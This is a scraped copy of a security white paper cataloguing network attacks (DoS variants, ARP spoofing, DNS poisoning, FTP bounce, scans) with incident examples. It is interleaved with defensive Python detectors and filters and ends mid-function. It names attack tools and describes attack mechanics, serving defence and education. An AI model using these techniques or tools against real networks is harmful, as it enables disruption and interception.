type of attacks dsci white paper 1

Upload: srivalavala

Post on 06-Apr-2018


  • 8/3/2019 Type of Attacks DSCI White Paper 1

    1/30

    A NASSCOM Initiative

    White Paper: Type of Attacks

    Author: Mr. Mayank Lau

    Consultant, Security Practices

    DATA SECURITY COUNCIL OF INDIA

    Niryat Bhawan, 3rd Floor, Rao Tula Ram

    Marg, New Delhi 110057

    P: +91-11-26155071 |W:www.dsci.in


    EXECUTIVE SUMMARY

    As business and everyday interaction go digital and mobile, IT security specialists and white hats are finding it increasingly difficult to guard against an ever-growing catalogue of threats. That catalogue is dynamic and needs continuous attention. To make our working and social environments safe from these threats, the first step we can take is to understand how they work and how they behave. With that in mind, this white paper consolidates the definitions of nearly all of these threats at a macro level. It is meant as a reference for anyone who needs the definition of each attack and the symptoms associated with it. Because both the endpoint and the network matter to every organization, the paper covers threats that affect both.

    The last decade has witnessed a paradigm shift in how attackers look to exploit vulnerabilities in organizational and national infrastructure. To counter that, all of us have to change the way we think about security. This white paper discusses recent exploits and what can be learned from them.

    Keeping the paper current, and shedding further light on the nature and behaviour of infection vectors, will require a collaborative effort from all of us.


    Contents

    1. DoS Attacks: ................................................................................................................... 4

    2. Ping Flood: ...................................................................................................................... 8

    3. Ping of Death: ................................................................................................................. 9

    4. Port Scanning: ............................................................................................................... 10

    5. ARP Spoofing: .............................................................................................................. 10

    6. ACK flood:.................................................................................................................... 13

    7. FTP Bounce Attack: ..................................................................................................... 13

    8. TCP Session Hijacking: ................................................................................................ 13

    9. Man-In-The-Middle Attack: ......................................................................................... 13

    10. Social Engineering Attacks: ........................................................................................ 14

    11. OS Finger Printing: ..................................................................................................... 15

    12. Stealth Scan:................................................................................................................ 15

    13. Key-Loggers: .............................................................................................................. 15

    14. ICMP Tunneling: ........................................................................................................ 16

    15. LOKI Attack: .............................................................................................................. 16

    16. TCP Sequence Attack: ................................................................................................ 17

    17. CAM Table Overflow: ................................................................................................ 17

    18. WEB APPLICATION ATTACKS: ............................................................................ 19

    19. Virus:........................................................................................................................... 24

    20. Worm: ......................................................................................................................... 24

    21. Malware: ..................................................................................................................... 25

    22. Adware: ....................................................................................................................... 26

    23. Spyware: ..................................................................................................................... 26

    24. Trojan: ......................................................................................................................... 27

    25. Rootkit: ....................................................................................................... 28

    REFERENCES ................................................................................................................. 29


    1. DoS Attacks:

    In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate users from accessing information or services.

    The most common and obvious type of DoS attack occurs when an attacker "floods" a network or server with traffic. When you type a URL into your browser, you send a request to that site's server to view the page. The server can only process a certain number of requests at once, so if an attacker overloads it with requests it cannot process yours. This is a "denial of service" because you cannot access that site.

    Tools commonly used are hping, Nemesis and other packet-crafting tools.

    Symptoms:

    unusually slow network performance (opening files or accessing websites)

    unavailability of a particular website

    inability to access any website

    dramatic increase in the amount of spam you receive in your account

    Examples: On December 8, 2010, a group calling itself "Anonymous" launched coordinated DDoS attacks on organizations such as Mastercard.com, PayPal, Visa.com and PostFinance as part of the ongoing "Operation Payback" campaign, which originally targeted anti-piracy organizations, in support of the whistleblowing site WikiLeaks and its founder, Julian Assange. The attacks took the Mastercard, PostFinance and Visa websites offline using three versions of the group's denial-of-service tool.

    On November 28, 2010, wikileaks.org itself experienced a DDoS attack, presumably related to the pending release of many thousands of secret diplomatic cables.


    Types of DoS Attack:

    1. ICMP Flood Attack

    2. Teardrop Attack

    3. Smurf Attack

    4. SYN Flood

    5. Land Attack

    6. Jolt DoS Attack

    7. Fraggle DoS Attack

    Teardrop Attacks:

    A series of IP fragments is sent to the target with overlapping fragment offsets and oversized payloads. The target's reassembly code cannot reconstruct a consistent datagram from the overlapping pieces and, on a vulnerable stack, crashes, hangs or even reboots.

    Example

    Around September 2009, a vulnerability in Windows Vista was referred to as a "teardrop attack", although it actually targeted SMB2, a much higher layer than the IP fragmentation that the original teardrop exploited.

    Land Attack:

    The attacker sends a spoofed TCP SYN packet in which the target's own IP address (and usually the same port) fills both the source and destination fields. A vulnerable target answers itself, and the resulting loop can lock the machine up.

    Note: modern operating systems and firewalls drop packets whose source and destination addresses are identical, so this attack rarely succeeds today.

    Example

    This flaw was first discovered in 1997 by someone using the alias "m3lt", and resurfaced years later in operating systems such as Windows Server 2003 and Windows XP SP2.


    Jolt DoS Attack:

    The attacker sends a continuous stream of fragmented packets (Jolt2 uses ICMP and other IP fragments) crafted so that the target can never complete reassembly. CPU usage on the target climbs to 100% and the machine may crash.

    Example:

    In August 2009 Twitter was knocked offline by a denial-of-service attack, part of a series of attacks that also targeted large web hosts and domain registrars. Both Netcraft and Pingdom reported about three hours of downtime, and co-founder Biz Stone confirmed that the outage was caused by a denial-of-service attack affecting both the Twitter website and the services that access Twitter data via API calls. Public reporting described a distributed flood rather than a Jolt-style fragment attack, so the incident illustrates the impact of a DoS rather than this particular technique.

    Smurf Attack:

    The attacker sends a large number of ICMP echo requests to the IP broadcast address of an intermediary network, with the source address spoofed to that of the intended victim. If the router delivers the directed broadcast to every host on the segment, each host sends an echo reply to the victim. On a multi-access broadcast network hundreds of computers may reply to each request, so the attacker's traffic is amplified many times over and the victim's link is overwhelmed.



    Fraggle DoS Attack:

    Fraggle is the UDP counterpart of Smurf. The attacker sends a large amount of UDP traffic to the echo (port 7) or chargen (port 19) service on an IP broadcast address, with the source address spoofed to the victim. Every host on the segment that runs the service replies to the victim, amplifying the attack in the same way as Smurf. Both attacks are defeated by disabling directed broadcasts on routers and the echo and chargen services on hosts.

    Example (a web application flaw, not an amplification attack)

    In June 2010 a group calling itself Goatse Security exploited a flaw in an AT&T web application that returned the e-mail address linked to an iPad 3G SIM identifier, exposing the addresses of over 100,000 customers. Many high-ranking media, government and military members of Apple's early adopter programme were on the list, including numerous members of the U.S. Department of Defense's advanced research team. Websense believes that Apple will continue to be a favoured target as its products spread through work environments.


    SYN Flood:

    A SYN flood sends a stream of TCP SYN packets, often with a forged sender address. Each packet is handled like a connection request, causing the server to create a half-open connection, send back a TCP SYN-ACK, and wait for the final ACK from the sender address. Because the sender address is forged, that response never comes. The half-open connections saturate the server's connection backlog, keeping it from responding to legitimate requests until the attack ends.
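What a defender can do with the half-open state described above, as an added example (this Python was written for this page and is not from the white paper): replay a constructed list of TCP segments, keep the handshakes that never received the client's final ACK, and report destinations whose backlog of half-open connections is abnormal. The addresses, the 200-packet burst and the threshold of 100 are assumptions.

```python
from collections import defaultdict

# Constructed traffic sample: (time, src_ip, src_port, dst_ip, dst_port, flags).
# Flags are from the client's perspective: "S" = SYN, "A" = the ACK that
# completes the handshake, "R"/"F" = the client tore the attempt down.
def build_sample_segments():
    segs = []
    legit = [("203.0.113.5", "192.0.2.10", 443),
             ("203.0.113.6", "192.0.2.10", 443),
             ("203.0.113.7", "192.0.2.20", 80)]
    for i, (src, dst, dport) in enumerate(legit):
        segs.append((float(i), src, 40000 + i, dst, dport, "S"))
        segs.append((i + 0.1, src, 40000 + i, dst, dport, "A"))   # handshake completes
    # 200 SYNs from 200 forged sources that never send the final ACK
    for i in range(200):
        segs.append((1.0 + i * 0.01, f"198.51.100.{i % 250}", 1024 + i,
                     "192.0.2.10", 443, "S"))
    return segs

def half_open_by_destination(segments):
    """Replay the segments; return {(dst_ip, dst_port): (half_open, distinct_sources)}."""
    pending = {}   # 4-tuple -> time the SYN was seen
    for t, src, sport, dst, dport, flags in sorted(segments, key=lambda s: s[0]):
        key = (src, sport, dst, dport)
        if flags == "S":
            pending.setdefault(key, t)
        elif flags in ("A", "R", "F"):
            pending.pop(key, None)          # handshake finished or aborted
    stats = defaultdict(lambda: [0, set()])
    for (src, sport, dst, dport), t in pending.items():
        stats[(dst, dport)][0] += 1
        stats[(dst, dport)][1].add(src)
    return {k: (n, len(srcs)) for k, (n, srcs) in stats.items()}

def syn_flood_targets(segments, threshold=100):
    """Destinations whose backlog of unanswered SYNs reaches the threshold. A source
    diversity near 1.0 (every SYN from a different address) is typical of forged
    sources; a genuine traffic burst repeats source addresses."""
    report = {}
    for (dst, dport), (n, nsrc) in half_open_by_destination(segments).items():
        if n >= threshold:
            report[f"{dst}:{dport}"] = {"half_open": n, "distinct_sources": nsrc,
                                        "source_diversity": round(nsrc / n, 2)}
    return report

if __name__ == "__main__":
    print(syn_flood_targets(build_sample_segments()))
```

A production version would age out pending entries after the server's SYN-ACK retransmit window rather than keeping them forever, and would compare the half-open count against the host's configured backlog size.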

    2. Ping Flood:

    A ping flood sends the victim an overwhelming number of ICMP echo request packets, usually with the -f (flood) option of the UNIX ping command (the -t option on Windows merely pings until stopped and is far less aggressive). It is very simple to launch; the primary requirement is access to more bandwidth than the victim.

    Example

    On August 6, 2009 several social networking sites, including Twitter, Facebook, LiveJournal and Google's blogging pages, were hit by flood attacks apparently aimed at the Georgian blogger "Cyxymu", causing downtime on some of these sites.


    3. Ping of Death:

    The attacker sends a fragmented ICMP echo request whose reassembled size exceeds 65,535 bytes, the maximum IP packet size. A vulnerable OS overflows its reassembly buffer and freezes or crashes while reassembling the packet.

    Modern operating systems check the reassembled length and discard such packets.

    Example

    The bug class is not dead: in August 2011 Microsoft issued 13 security updates patching 22 vulnerabilities in Internet Explorer 9, Windows, the Windows DNS service, Office and other software, including a TCP/IP flaw that harked back two decades to the original "Ping of Death".
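Teardrop, Jolt and the Ping of Death all abuse the same mechanism: IP fragment reassembly. As an added illustration (Python written for this page, not part of the white paper), the code below is a minimal reassembler that applies the three checks a robust stack performs: it rejects overlapping fragments (Teardrop), refuses to grow a datagram past 65,535 bytes (Ping of Death), and reports a fragment set that can never complete (the never-finishing stream Jolt sends). Fragment offsets are given in bytes, the 20-byte header length is an assumption, and the sample fragments are constructed.

```python
MAX_IP_DATAGRAM = 65535      # maximum IPv4 total length, header included
IP_HEADER_LEN = 20           # assumed: no IP options

class FragmentError(ValueError):
    """Base class; the subclasses name the attack pattern each check catches."""

class OverlapError(FragmentError):      # Teardrop: fragments overlap
    pass

class OversizeError(FragmentError):     # Ping of Death: reassembled size > 65535
    pass

class IncompleteError(FragmentError):   # Jolt-style: the set never completes
    pass

def fragment(payload, mtu=1500):
    """Split a payload the way a sender would: (offset, more_fragments, data).
    Offsets must be multiples of 8 because the wire encodes them in 8-byte units."""
    chunk = (mtu - IP_HEADER_LEN) // 8 * 8
    frags = []
    for off in range(0, len(payload), chunk):
        data = payload[off:off + chunk]
        frags.append((off, off + chunk < len(payload), data))
    return frags

def reassemble(fragments):
    """Rebuild the payload of one datagram, or raise a FragmentError subclass."""
    frags = sorted(fragments, key=lambda f: f[0])
    if not frags:
        raise IncompleteError("no fragments")
    buf = bytearray()
    expected = 0              # next byte offset we need
    final_seen = False
    for offset, more, data in frags:
        if final_seen:
            raise OverlapError("data beyond the fragment marked as last")
        if offset < expected:   # this piece would overwrite bytes already placed
            raise OverlapError(f"fragment at {offset} overlaps data up to {expected}")
        if offset > expected:   # hole: nothing arrived for [expected, offset)
            raise IncompleteError(f"missing bytes {expected}-{offset}")
        if offset + len(data) + IP_HEADER_LEN > MAX_IP_DATAGRAM:
            raise OversizeError("reassembled datagram would exceed 65535 bytes")
        buf += data             # only grow the buffer after the size check
        expected = offset + len(data)
        final_seen = not more
    if not final_seen:
        raise IncompleteError("last fragment never arrived")
    return bytes(buf)

def classify(fragments):
    """Label a fragment set: 'ok', 'teardrop', 'ping_of_death' or 'incomplete'."""
    try:
        reassemble(fragments)
        return "ok"
    except OverlapError:
        return "teardrop"
    except OversizeError:
        return "ping_of_death"
    except IncompleteError:
        return "incomplete"

# Constructed samples.
BENIGN = fragment(b"A" * 3000)                                    # three clean pieces
TEARDROP = [(0, True, b"x" * 1480), (1000, False, b"y" * 800)]    # second piece overlaps the first
PING_OF_DEATH = fragment(b"P" * 65600)                            # completes to more than 65535 bytes
JOLT_LIKE = [(1480, True, b"j" * 8)]                               # starts past offset 0, never finishes

if __name__ == "__main__":
    for name, frags in [("benign", BENIGN), ("teardrop", TEARDROP),
                        ("ping_of_death", PING_OF_DEATH), ("jolt_like", JOLT_LIKE)]:
        print(name, "->", classify(frags))
```

A real stack also expires incomplete sets after a timeout and caps the memory held by pending fragments; Jolt's never-completing stream is aimed precisely at that reassembly state.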

    Distributed Denial of Service (DDoS):

    In a distributed denial-of-service (DDoS) attack, an attacker may use your computer to attack another computer. By taking advantage of security vulnerabilities or weaknesses, an attacker can take control of your computer and then force it to send huge amounts of data to a website or spam to particular email addresses. The attack is "distributed" because the attacker uses multiple computers, including yours, to launch the denial of service. Tools used include TFN (Tribe Flood Network), TFN2K, Trin00, Trinity, Stacheldraht, Shaft and MStream.

    Example

    In July and August 2010, the Irish Central Applications Office server was hit by a denial-of-service attack on four separate occasions, causing difficulties for thousands of second-level students who must use the CAO to apply for university and college places. The attack became the subject of a Garda investigation.


    Prevention:

    1. Applying router filtering

    2. Blocking undesired IP addresses

    3. Permitting network access only to desired traffic

    4. Disabling unneeded network services (for example the echo and chargen services and directed broadcasts that Smurf and Fraggle rely on)

    5. Updating antivirus regularly, so that your own hosts are not recruited into a botnet

    6. Having a strong password policy, for the same reason

    7. Rate-limiting network bandwidth per source, and using SYN cookies or backlog tuning against SYN floods

    8. Using network ingress filtering (BCP 38) so that packets with spoofed source addresses are dropped at the edge
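How the first, fourth and eighth items above look as an actual packet policy, as an added example (Python written for this page, not the white paper's): it applies BCP 38 ingress/egress filtering and drops the directed-broadcast echo and chargen traffic that Smurf and Fraggle rely on. The prefix 192.0.2.0/24, the bogon list and the sample packets are assumptions.

```python
import ipaddress

INTERNAL = ipaddress.ip_network("192.0.2.0/24")     # assumed: the prefix behind this router
BOGONS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4")]
AMPLIFIER_UDP_PORTS = {7, 19}                         # echo and chargen (Fraggle)
LIMITED_BROADCAST = ipaddress.ip_address("255.255.255.255")

def filter_packet(pkt, from_inside):
    """pkt: dict(src, dst, proto, dport=None). from_inside: True when the packet
    arrived on the internal interface. Returns (verdict, reason)."""
    src = ipaddress.ip_address(pkt["src"])
    dst = ipaddress.ip_address(pkt["dst"])
    if from_inside and src not in INTERNAL:
        return "drop", "egress: source address is not ours (BCP 38)"
    if not from_inside and src in INTERNAL:
        return "drop", "ingress: our own prefix arriving from outside (spoofed)"
    if any(src in net for net in BOGONS):
        return "drop", "bogon source address"
    if dst in (INTERNAL.broadcast_address, LIMITED_BROADCAST):
        if pkt["proto"] == "icmp":
            return "drop", "directed-broadcast ICMP echo (Smurf amplifier)"
        if pkt["proto"] == "udp" and pkt.get("dport") in AMPLIFIER_UDP_PORTS:
            return "drop", "directed-broadcast UDP echo/chargen (Fraggle amplifier)"
    return "accept", ""

def apply_policy(packets):
    """Run the policy over (pkt, from_inside) pairs; return the verdicts in order."""
    return [filter_packet(p, inside)[0] for p, inside in packets]

# Constructed packets: the victim is 203.0.113.9, outside our network.
SAMPLE = [
    ({"src": "203.0.113.9", "dst": "192.0.2.255", "proto": "icmp"}, False),             # Smurf
    ({"src": "203.0.113.9", "dst": "192.0.2.255", "proto": "udp", "dport": 7}, False),   # Fraggle
    ({"src": "203.0.113.50", "dst": "198.51.100.1", "proto": "tcp", "dport": 80}, True),  # spoofed egress
    ({"src": "192.0.2.77", "dst": "192.0.2.10", "proto": "tcp", "dport": 22}, False),    # spoofed ingress
    ({"src": "192.0.2.10", "dst": "198.51.100.1", "proto": "tcp", "dport": 443}, True),  # normal outbound
    ({"src": "198.51.100.1", "dst": "192.0.2.10", "proto": "tcp", "dport": 443}, False), # normal inbound
    ({"src": "198.51.100.1", "dst": "192.0.2.255", "proto": "udp", "dport": 53}, False), # broadcast, not an amplifier
]

if __name__ == "__main__":
    for pkt, inside in SAMPLE:
        print(pkt["src"], "->", pkt["dst"], filter_packet(pkt, inside))
```

The egress rule is the one that matters most for the Internet as a whole: if every edge network dropped packets whose source is not its own prefix, spoofed floods such as Smurf and Fraggle could not be launched from it at all.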

    4. Port Scanning:

    Port scanning is one of the most popular reconnaissance techniques attackers use to discover services they can break into. Every machine connected to a local area network (LAN) or the Internet runs services that listen on well-known and not-so-well-known ports. A port scan helps the attacker find which ports are open (i.e., which service may be listening on a port).

    Essentially, a port scan sends a probe to each port, one at a time. The kind of response received indicates whether the port is in use and can therefore be probed further for weaknesses.

    Well Known Ports (0 - 1023)

    Registered Ports (1024 - 49151)

    Dynamic and/or Private Ports (49152 - 65535)

    5. ARP Spoofing:

    ARP spoofing, also called ARP poison routing (APR), is a technique used to attack an Ethernet wired or wireless network. By sending forged ARP replies, the attacker associates his own MAC address with the IP address of another host (typically the default gateway), so that frames meant for that host are delivered to him instead. ARP spoofing may allow an attacker to sniff data frames on a local area network (LAN), modify the traffic, or stop it altogether. The attack can only be used on networks that actually use ARP for address resolution.


    Detection: Watch the ARP traffic on the segment. Reverse ARP (RARP) can be used to query the IP address associated with a given MAC address; if more than one IP address is returned for one MAC, cloning or spoofing is likely. More reliably, a passive monitor (such as arpwatch or XArp) alerts when an IP address suddenly maps to a different MAC address, and static ARP entries for the gateway defeat the attack on critical hosts.

    Tools (attack): Arpoison, Cain and Abel, and Ettercap
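The detection heuristics above, as an added example (Python written for this page, not from the white paper): a passive monitor that learns IP-to-MAC bindings from ARP replies and raises an alert when an IP address changes MAC, when the gateway's address is claimed by a new MAC, or when a single MAC claims several IP addresses (the RARP-style check). The addresses and the reply sequence are constructed.

```python
from collections import defaultdict

class ArpMonitor:
    """Passive ARP-spoofing detector. Feed it every ARP reply seen on the segment."""

    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.ip_to_mac = {}                  # what each IP last claimed to be
        self.mac_to_ips = defaultdict(set)   # the RARP-style view: IPs per MAC
        self.alerts = []

    def observe(self, sender_ip, sender_mac):
        sender_mac = sender_mac.lower()
        previous = self.ip_to_mac.get(sender_ip)
        if previous is not None and previous != sender_mac:
            self.alerts.append(("ip_changed_mac", sender_ip, previous, sender_mac))
            if sender_ip == self.gateway_ip:
                # the classic MITM setup: someone now answers for the default gateway
                self.alerts.append(("gateway_poisoned", sender_ip, previous, sender_mac))
        self.ip_to_mac[sender_ip] = sender_mac
        self.mac_to_ips[sender_mac].add(sender_ip)
        if len(self.mac_to_ips[sender_mac]) > 1:
            self.alerts.append(("mac_claims_multiple_ips", sender_mac,
                                tuple(sorted(self.mac_to_ips[sender_mac]))))

    def alert_kinds(self):
        return sorted({a[0] for a in self.alerts})

# Constructed ARP replies (sender IP, sender MAC) in the order seen on the wire.
SAMPLE_REPLIES = [
    ("192.0.2.1",  "aa:bb:cc:00:00:01"),   # real gateway
    ("192.0.2.20", "aa:bb:cc:00:00:20"),   # an ordinary host
    ("192.0.2.66", "aa:bb:cc:00:00:66"),   # the attacker's own address
    ("192.0.2.1",  "aa:bb:cc:00:00:66"),   # forged reply: "the gateway is at my MAC"
    ("192.0.2.20", "aa:bb:cc:00:00:66"),   # forged reply aimed at the gateway side
]

def analyze(replies, gateway_ip="192.0.2.1"):
    mon = ArpMonitor(gateway_ip)
    for ip, mac in replies:
        mon.observe(ip, mac)
    return mon

if __name__ == "__main__":
    for alert in analyze(SAMPLE_REPLIES).alerts:
        print(alert)
```

Treat the multiple-IP alert as a lead rather than proof: a router with several addresses on one interface, or a VRRP/HSRP failover, legitimately produces the same pattern. The gateway-changed alert is the one worth paging on.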

    Example

    A packet sniffer planted on the point-of-sale network of a Dave & Buster's restaurant in Islandia, New York, captured data for about 5,000 customers, causing losses of at least $600,000 to the card-issuing banks. The defendants had successfully penetrated a terminal at an Arundel, Maryland, location in April 2007, but their sniffer did not work there, so they were unable to obtain any credit card data. Improved versions of their program logged the information successfully, but a bug caused the software to be deactivated each time the point-of-sale servers were rebooted.

    MAC Flood Attack: In a typical MAC flooding attack, a switch is flooded with frames, each carrying a different source MAC address. The intention is to consume the limited memory set aside in the switch to store the MAC-address-to-physical-port translation table (the CAM table). The usual tool is macof from the dsniff suite; XArp, listed with this attack in some references, is actually an ARP-spoofing detector.

    Once the table is full the switch enters a state called fail-open mode, in which frames for unknown destinations are broadcast out on all ports (as with a hub) instead of only the correct port as in normal operation. A malicious user can then use a packet sniffer (such as Wireshark) running in promiscuous mode to capture sensitive data from other computers (such as unencrypted passwords, e-mail and instant-messaging conversations) that would not be reachable were the switch operating normally. Port security, which limits the number of MAC addresses learned per port, is the standard countermeasure.


    Example

    Anti-Spyware 2011, a rogue security program that targets Windows 9x, 2000, XP, Vista and Windows 7, poses as an anti-spyware product. It disables the security-related processes of genuine anti-virus programs while also blocking access to the Internet, which prevents updates. (It is malware rather than a MAC flooding attack; MAC flooding incidents are rarely reported publicly because they happen inside a LAN.)

    DNS cache poisoning:

    This is a maliciously created or unintended situation in which a caching name server receives data that did not originate from authoritative Domain Name System (DNS) sources. It can happen through improper software design, misconfiguration of name servers, or deliberately designed scenarios that exploit the traditionally open architecture of DNS. Once a DNS server has accepted such non-authentic data and cached it to speed up future lookups, it is considered poisoned and hands the non-authentic data to all of its clients until the record expires. Resolvers defend themselves by randomizing transaction IDs and source ports, by refusing records outside the bailiwick of the server being queried, and with DNSSEC validation.
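Why the bailiwick rule matters, as an added example (Python written for this page, not from the white paper): a toy resolver cache that checks transaction ID and port before accepting a response, once without and once with the bailiwick check, fed a constructed response in which the server for example.com slips in a record for a domain it is not authoritative for. Names, addresses and the transaction ID are assumptions.

```python
def in_bailiwick(name, zone):
    """True if `name` is inside `zone` (the domain the answering server is authoritative for)."""
    name = name.lower().rstrip(".") + "."
    zone = zone.lower().rstrip(".") + "."
    return name == zone or name.endswith("." + zone)

class ResolverCache:
    def __init__(self, enforce_bailiwick):
        self.enforce_bailiwick = enforce_bailiwick
        self.records = {}            # (name, rtype) -> rdata

    def accept_response(self, query, response):
        """query: what we sent (name, txid, port, zone of the server asked).
        response: what arrived. Returns True if the response was used."""
        # A reply must match the outstanding question exactly; otherwise it is a stray
        # or a spoof and is ignored (random txid and port make a blind spoof hard to hit).
        if (response["txid"], response["port"], response["name"]) != \
           (query["txid"], query["port"], query["name"]):
            return False
        for name, rtype, rdata in response["answer"] + response["additional"]:
            if self.enforce_bailiwick and not in_bailiwick(name, query["zone"]):
                continue     # off-bailiwick "glue" is the poisoning vector: drop it
            self.records[(name.lower(), rtype)] = rdata
        return True

    def lookup(self, name, rtype="A"):
        return self.records.get((name.lower(), rtype))

# Constructed exchange: the resolver asks example.com's server for www.example.com.
QUERY = {"name": "www.example.com.", "txid": 0x1A2B, "port": 41234, "zone": "example.com."}
POISONED_RESPONSE = {
    "name": "www.example.com.", "txid": 0x1A2B, "port": 41234,
    "answer": [("www.example.com.", "A", "192.0.2.10")],
    # the attacker's server tacks on a record for a domain it has no authority over
    "additional": [("www.bank.example.", "A", "198.51.100.66")],
}
FORGED_RESPONSE = dict(POISONED_RESPONSE, txid=0x0001)   # blind spoof guessing the txid

def run(enforce_bailiwick):
    cache = ResolverCache(enforce_bailiwick)
    cache.accept_response(QUERY, POISONED_RESPONSE)
    return cache

if __name__ == "__main__":
    print("weak   :", run(False).lookup("www.bank.example."))
    print("strict :", run(True).lookup("www.bank.example."))
```

The transaction-ID check alone is only 16 bits of protection; a resolver that also randomizes its source port forces a blind attacker to guess both, and DNSSEC removes the guessing game entirely by letting the resolver verify the data rather than its origin.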

    Example

    In July 2009 Symantec discovered the Daprosy worm, a Trojan worm intended to steal online-game passwords in Internet cafés. It can intercept all keystrokes and send them to its author, which makes it particularly dangerous for business systems. (It is a keylogging worm rather than a DNS cache poisoning attack.)

    IP Spoofing:

    IP spoofing refers to the creation of Internet Protocol (IP) packets with a forged source IP address, with the purpose of concealing the identity of the sender or impersonating another computing system. Many of the attacks above (Smurf, Fraggle, SYN floods, Land) depend on it.


    6. ACK flood:

    This technique sends a stream of TCP ACK packets to the target, often with forged source addresses. It is similar in spirit to a SYN flood, but since the ACKs belong to no existing connection the damage comes from the server or stateful firewall having to look up and reject each one rather than from half-open connections.

    7. FTP Bounce Attack:

    The attacker connects to an FTP server and uses the PORT command to make the server open its data connection to a third machine and port of the attacker's choosing. The FTP server tries to connect to the specified host and port, which tells the attacker whether that port is open (and lets him push data to it) from the server's trusted address, since FTP transfers are usually allowed through firewalls. These days almost all FTP servers reject PORT commands that specify an address other than the client's own.
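The server-side check that closes the bounce, as an added example (Python written for this page, not from the white paper): parse the PORT argument, recover the address and port it encodes, and refuse any data connection that does not go back to the control-connection peer on an unprivileged port. The addresses are constructed.

```python
import re

PORT_RE = re.compile(r"^PORT\s+(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$")

def parse_port(command):
    """Decode 'PORT h1,h2,h3,h4,p1,p2' into (ip, port); port = p1*256 + p2."""
    m = PORT_RE.match(command)
    if not m:
        raise ValueError("malformed PORT command")
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):
        raise ValueError("octet out of range")
    ip = ".".join(str(n) for n in nums[:4])
    return ip, nums[4] * 256 + nums[5]

def validate_port(command, control_peer_ip):
    """Server-side check that defeats the bounce: the data connection may only go
    back to the host that opened the control connection, on an unprivileged port."""
    try:
        ip, port = parse_port(command)
    except ValueError as exc:
        return False, str(exc)
    if ip != control_peer_ip:
        return False, f"data address {ip} differs from control peer {control_peer_ip} (bounce attempt)"
    if port <= 1023:
        return False, f"refusing privileged data port {port}"
    return True, f"ok: data connection to {ip}:{port}"

# Constructed session: the attacker at 203.0.113.9 talks to the FTP server and
# asks it to open a data connection to an internal mail server on port 25.
ATTACKER = "203.0.113.9"
COMMANDS = [
    "PORT 203,0,113,9,4,1",        # legitimate: back to the client, port 1025
    "PORT 192,0,2,25,0,25",        # bounce: the server would connect to 192.0.2.25:25
    "PORT 203,0,113,9,0,80",       # same client, but a privileged port
    "PORT 999,0,0,1,4,1",          # malformed octet
]

if __name__ == "__main__":
    for cmd in COMMANDS:
        print(cmd, "->", validate_port(cmd, ATTACKER))
```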

    8. TCP Session Hijacking:

    This is the case where the attacker takes over an existing TCP session that has already been established between two parties. Since most TCP session authentication occurs only at the beginning of the session, an attacker who can observe or predict the sequence numbers in use can inject his own segments, and the victim accepts them as part of the authenticated session.

    9. Man-In-The-Middle Attack:

    Also called a Janus attack and abbreviated MITM, this occurs when the attacker sits between two legitimate parties, relaying and sniffing their communication to obtain valuable data such as passwords, usernames or even certificates and keys for later use. MITM is active eavesdropping: the attacker can alter the traffic, not just read it.


    Example

    Oklahoma Tax Commission site compromised (attack date: 01/29/2010)

    Attack details: Websense Security Labs and the Websense ThreatSeeker Network discovered that the home page of the Oklahoma Tax Commission website had been compromised with malicious script code. After the page loaded, the browser executed the injected script in the background. The script went through a series of de-obfuscation steps that ultimately took the victim's computer to an attack website without the victim's consent or knowledge. (Strictly this is a compromised-website, drive-by attack: the injection was done on the server, not by an attacker on the network path.)

    10. Social Engineering Attacks:

    A social engineering attack is one in which the intended victim is somehow tricked into doing the attacker's bidding: for example, replying to an e-mail sent by the attacker, or revealing confidential data during a phone call from an attacker impersonating a legitimate user or colleague.

    Example

    World Cup targeted by malicious spam campaign using social engineering techniques, June 2010

    Attack details: Websense Security Labs and the Websense ThreatSeeker Network detected a new wave of interesting malicious e-mails. At the dawn of the eagerly anticipated World Cup tournament we expected to be inundated with suitably themed spam. The sample we encountered was a little different from the usual, because the technique used may not raise suspicion. We saw over 80,000 e-mail messages in this new campaign, which used an HTML attachment with embedded JavaScript. Upon execution, this script led to a malicious website.


    11. OS Finger Printing:

    Each operating system implements the TCP/IP stack slightly differently (initial TTL, window size, TCP option ordering, responses to unusual flag combinations). While a port scan is running, the scanner analyses these details and tries to match them against the fingerprints in its database.

    Inverse Mapping:

    Inverse mapping is a stealthy network scanning method that gathers information about inactive IP addresses on a network (for example from the ICMP unreachable messages routers return for them) in order to deduce which IP addresses belong to active hosts.

    12. Stealth Scan:

    Port scans carried out in a way that evades filtering or blocking devices (IPS, IDS, firewall) using techniques such as SYN (half-open) scans, ACK scans, FIN scans and NULL scans. Slowing the interval between probes and fragmenting the packets also matter when it comes to a stealth scan.
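What telling these scans apart from ordinary traffic looks like in practice, as an added example for sections 4 and 12 (Python written for this page, not from the white paper): classify each probing source by the TCP flags it sends, count the distinct ports it touches, and infer open ports from the replies; for FIN/NULL/Xmas probes a closed port answers with RST while an open port stays silent. The addresses, ports and the min_ports threshold are assumptions.

```python
from collections import Counter, defaultdict

# Probe flag pattern (characters sorted) -> scan type, as described above.
SCAN_SIGNATURES = {"S": "SYN scan", "F": "FIN scan", "": "NULL scan",
                   "FPU": "Xmas scan", "A": "ACK scan"}

def detect_scans(records, min_ports=10):
    """records: (time, src, sport, dst, dport, flags). Returns {scanner_ip: report}."""
    probes = defaultdict(lambda: {"ports": set(), "flags": Counter()})
    replies = {}                                   # (scanner, target, port) -> reply flags
    for _, src, sport, dst, dport, flags in records:
        f = "".join(sorted(flags))
        if f in ("AS", "AR"):                      # SYN-ACK or RST-ACK: a scanned port answering
            replies[(dst, src, sport)] = f
        else:                                       # everything else is treated as a probe
            probes[(src, dst)]["ports"].add(dport)
            probes[(src, dst)]["flags"][f] += 1
    reports = {}
    for (scanner, target), info in probes.items():
        if len(info["ports"]) < min_ports:         # a normal client touches a few ports
            continue
        probe_flag = info["flags"].most_common(1)[0][0]
        kind = SCAN_SIGNATURES.get(probe_flag, "unknown")
        open_ports = []
        for port in sorted(info["ports"]):
            reply = replies.get((scanner, target, port))
            if kind == "SYN scan":
                if reply == "AS":                   # SYN-ACK means open
                    open_ports.append(port)
            elif reply != "AR":                     # FIN/NULL/Xmas: RST only from closed ports,
                open_ports.append(port)             # so silence means open or filtered
        reports[scanner] = {"target": target, "type": kind,
                            "ports_probed": len(info["ports"]), "open": open_ports}
    return reports

def sample_records():
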